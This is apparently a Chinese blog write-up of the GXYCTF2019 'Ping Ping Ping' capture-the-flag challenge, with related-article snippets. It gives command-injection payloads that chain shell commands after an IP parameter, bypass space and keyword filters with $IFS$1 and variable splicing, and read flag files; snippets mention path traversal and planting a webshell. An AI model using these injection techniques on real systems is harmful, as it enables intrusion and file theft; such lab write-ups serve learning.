[GXYCTF2019]Ping Ping Ping

最新推荐文章于 2023-02-01 13:10:52 发布
最新推荐文章于 2023-02-01 13:10:52 发布
阅读量536 收藏
点赞数
分类专栏: CTF题目笔记 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69856013/article/details/127254532
版权

感觉这个题跟另一个带ping提示的题目很相似

 根据提示很显然是在url里输入ip地址

 

联想到一道ping的题

所以?ip=127.0.0.1;ls

 

得到两个文件

自然想到cat flag.php

发现空格被过滤 

百度查找空格怎么绕过

把空格替换成$IFS$1

发现flag被过滤 

那就看看index.php里有啥

 

是一些过滤的字符,上网查怎么绕过

?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

使用a替换掉g这个过滤是检查f,l,a,g是否按顺序出现

 最后找到flag在网页源码中

1 and 1=1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF入门笔记之ping
qq_37410729的博客
11-02 4176
1.用命令行找flag文件 随便ping,然后跟ls 例如:1;ls 发现index.php文件 1;cat index.php 查看发现就是源网站。 那就向上找 1;ls …/ 继续向上找 直到1;ls …/…/…/ 发现flag 打开 1;cat …/…/…/flag 得到flag 2.绕过过滤打开文件 同样,先查看目录 payload:?ip=1;ls 发现两个文件,尝试直接打开index文件(虽然知道肯定不行) payload:?ip=1;cat index.php 果然不行
CTF关于ping命令注入问题(1)
欢迎来到神林的博客
03-07 1万+
题目样式 对于看到ping或者ping命令却没有弄waf时就要想到命令注入。 具体注入方法 看到ping命令就可以利用截断来执行新的命令。 首先测试所有的截断符号: ‘$’ ‘;’ ‘|’ ‘-’ ‘(’ ‘)’ ‘反引号’ ‘||’ ‘&&’ ‘&’ ‘}’ ‘{’ '%0a’可以当作空格来用; 利用截断符号配合普通命令简单问题基本就出来; 例如:ip=127.0.0.1...
[GXYCTF2019]Ping Ping Ping 【多解】
PromisingQ
07-31 679
[GXYCTF2019]Ping Ping Ping 进入靶场环境:     加上题目是ping ping ping  所以可以猜测是需要我们命令执行读取flag 加上?ip=127.0.0.1 http://3d59e365-7e67-4e43-b2f5-dec887255281.node3.buuoj.cn/?ip=127.0.0.1    可以看到页面成功返回,我们尝试使用管道符执行我们想要执行的命令 ?ip=127.0.0.1 | ls 这个时候
CTFping命令绕过及符号用法
Hardworking666的博客
10-13 1万+
文章目录一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ig..
Linux批量pingIP地址
最新发布
05-17
在Linux系统中,通过shell脚本读取IP列表,进行批量ping操作,并记录结果
批量PingTelnet检测
12-25
批量Ping和Telnet检测是网络管理员常用的两种网络连通性检查工具,它们在IT领域中扮演着重要角色,尤其在大型网络环境中。批量检测能够大大提高工作效率,帮助快速定位网络问题。 **批量Ping检测** 批量Ping检测是...
PINGtest_ping_
09-28
标题"PINGtest_ping_"指的是一个用于测试网络连通性的工具,特别关注于使用"ping"命令来检查IP地址的可达性。"ping"是互联网控制报文协议(ICMP)的一部分,它允许网络设备发送“回显请求”到目标IP地址,然后接收...
ping工具.zip
03-19
"长ping工具.zip"是一个压缩包,其中包含了一个专门用于执行长时间ping操作的工具。这个工具不仅能够持续ping指定的IP地址,而且还能详细记录每次ping请求的响应时间和结果,这对于网络故障排查、网络延迟分析以及...
局域网IP PING测试工具
12-20
1.需运行在64位操作系统(直接上传exe有问题,放压缩文件中重新上传) 2.局域网IP PING测试工具,方便快速查询已使用,未使用的IP地址 3.例如输入192.168.168.10, 则从192.168.168.10开始,一直检测到192.168.168.254
CTF命令执行及绕过技巧
热门推荐
JBlock的博客
03-07 2万+
前言 今天是代码审计部分的一个技巧补充!前些阵子做了sql注入回顾篇系列!今天开启php代码审计系列! 今天内容主要是CTF中命令注入及绕过的一些技巧!以及构成RCE的一些情景! 文章目录前言正文代码执行代码执行的几种方式命令执行常见命令执行函数绕过姿势敏感字符绕过处理无回显的命令执行Think one Think 正文 在详细介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们的区...
BUUCTF-练习场-Web(5-8)
m0_62905745的博客
10-26 1500
SQL注入的解题大概步骤,以及爆表爆库查字段 绕过空格,替换字符的方法 命令执行漏洞
sql注入CTF常见考点方法总结
m0_52450604的博客
02-01 1003
SQL注入CTF常见考点总结
命令执行漏洞之CTF
qq_46085232的博客
07-09 414
命令执行漏洞之CTF[ACTF2020 新生赛]Exec[GXYCTF2019]Ping Ping Ping总结 作为菜鸟的我,开始想通过玩玩ctf,加深自己对漏洞的理解,和掌握一些绕过的思路。真的很好玩 [ACTF2020 新生赛]Exec 这是我做的第一道有关命令执行的题。(题目简单,就不贴图了) 1.通过标题,和一进去的ping的页面,就知道这里考的是命令执行,又因为这里是新生赛,难度也不大 2.通过我所学的知识,用‘;ls’,查看当前目录,然后就行通过echo写入一句话后门,也成功写入。用蚁剑连接,
CTF中,命令中空格被过滤的解决方法
m0_46315342的博客
08-20 2327
转载于: 作者:HyyMbb 链接:https://blog.csdn.net/a3320315/article/details/99773192 来源:CSDN博客
ctf】空格被过滤了
chualam的博客
11-09 598
如果是系统命令 则cat<文件 则cat{IFS}文件 则cat<>文件 如果是sql注入 则union/**/select
CTF-IP地址伪造(第1题)
asd158923328的博客
08-24 2759
根据题意 进入环境,根据提示,弱口令和系统设置只允许在服务器上登录。 用burp suite抓包,构造X-Forwarded-For:127.0.0.1,进入爆破,登录成功,获得key
GXYCTF2019 Ping Ping Ping 1
qq_52715164的博客
04-17 1405
解题步骤: 1,尝试用输入一个正确的IP地址 2,发现是linux系统下的网站,尝试用|和ls查看目录,列出文件 3,尝试查看flag文件,发现不能直接打开,且空格被过滤,原因:关键字被过滤 4,找到被过滤字符名单,尝试打开index.php文件,发现过滤字符列表 5,尝试绕过 代码中有个 $a 考虑进行变量覆盖,构造如下 payload ?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php ?ip=127.0.0.1;a=g,cat$IFS$1fla$a.php 或者另外一种方
[GXYCTF2019]Ping Ping Ping(命令执行)
mafucan的博客
06-21 707
常见写法127.0.0.1&&+code 只有在 && 左边的命令返回真(命令返回值 $? == 0),&& 右边的命令才 会被执行。 127.0.0.1&+code &表示将任务置于后台执行 127.0.0.1||+code 只有在 || 左边的命令返回假(命令返回值 $? == 1),|| 右边的命令才 会被执行。 127.0.0.1|+code | 表示管道,上一条命令的输出,作为下一条命令的参数 127.0.0.1;+code 多行语句用换行区分代码快,单行语句一般要用到分号来区分代码块1、 | 通
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值